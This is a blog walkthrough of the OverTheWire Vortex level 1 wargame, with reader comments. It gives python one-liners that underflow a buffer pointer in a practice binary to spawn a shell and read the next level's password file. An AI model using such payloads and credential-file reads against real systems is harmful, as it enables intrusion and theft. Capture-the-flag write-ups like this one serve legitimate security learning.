Overthewire Vortex Level1

This one is still a warming up level. Try to rebuild the code with some new printf statements, just to gather information of the memory layout:

printf("begin address of buf:\t%x\n", (unsigned int)buf);
printf("end address of buf:\t%x\n",((unsigned int)buf + sizeof(buf)));
printf("address of ptr:\t\t%x\n",&ptr);

As you can see

begin address of buf:	bffff490
end address of buf:	bffff690
address of ptr:		bffff48c

ptr is allocated before the buffer. So we must “underflow” the buffer. If you check the code carefully, you can see, that we should move the pointer back (“\\”), to point at “itself”, write the most significant byte (“\xca”), and then trigger the shell execution with any character (except “\n”,”\\”):

python -c 'print "\\"*0x101+"\xcaX"' |/vortex/level1
sh-3.2$ exit

A shell is spawned, but it exits immediately. I’ve tried to add some commands, after the spawn is triggered, but nothing happend. After some experiments, I figured out, if I provide a huge string, and the commands after it, we succeed:

python -c 'print  "\\"*0x101+"\xca!\n"+"A"*4000+"\nwhoami\ncat /etc/vortex_pass/vortex2"' |/vortex/level1.
sh-3.2$ sh: AAAAAAA [...] AAAAAAA: command not found
sh-3.2$ vortex2
sh-3.2$ ********
sh-3.2$ exit
This entry was posted in Wargame and tagged , , . Bookmark the permalink.

7 Responses to Overthewire Vortex Level1

  1. Pingback: Overthewire Vortex Level10 | Axtaxt's Blog

  2. player123 says:

    When you say rebuild the code, how did you do that remotely? Im not allowed to create a new files remotely.
    Are the source files located elsewhere other than /vortex? It seems i dont have privilege to create any new files

  3. axtaxt says:

    I’ve done it on my local machine! On the “vortexlabs” server you can create files in /tmp.

  4. NewPlayer says:

    why “\\”*0x101 ? how you find the number 0x101 ?

    • axtaxt says:

      I can’t reach the site now, so I don’t see what is the exact code. As far as I remember, we have a pointer which points to the middle of a 512 byte buffer. We have a target memory area which we want to override, and it is allocated right before the begining of the buffer. So we need to move back the pointer by 256 (to point to the beginning of the array) plus 1 to point before the beginning of the array, which is our target memory cell. 0x101 is 256 (0x100) + 1 in hex. ‘\\’ moves back the pointer.

  5. dave says:

    I spend 2 whole days trying to solve this. The problem I have with my stack layout is that ptr comes AFTER the buffer, so you can’t do it that way. I’m doing this on Kali Linux, compiled with gcc and tcc, both with the same effect. I was wandering if this was intentional, but appearently not 8(

  6. Patrick says:


    python -c ‘print “\\”*0x101+”\xcaX”‘ |/vortex/level1 doesn’t spawn a shell after execution. It shows me the output of buf (from the print function) and the “All done” text. It seems I’m getting a “\n” somewhere. Any suggestions? Thanks

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s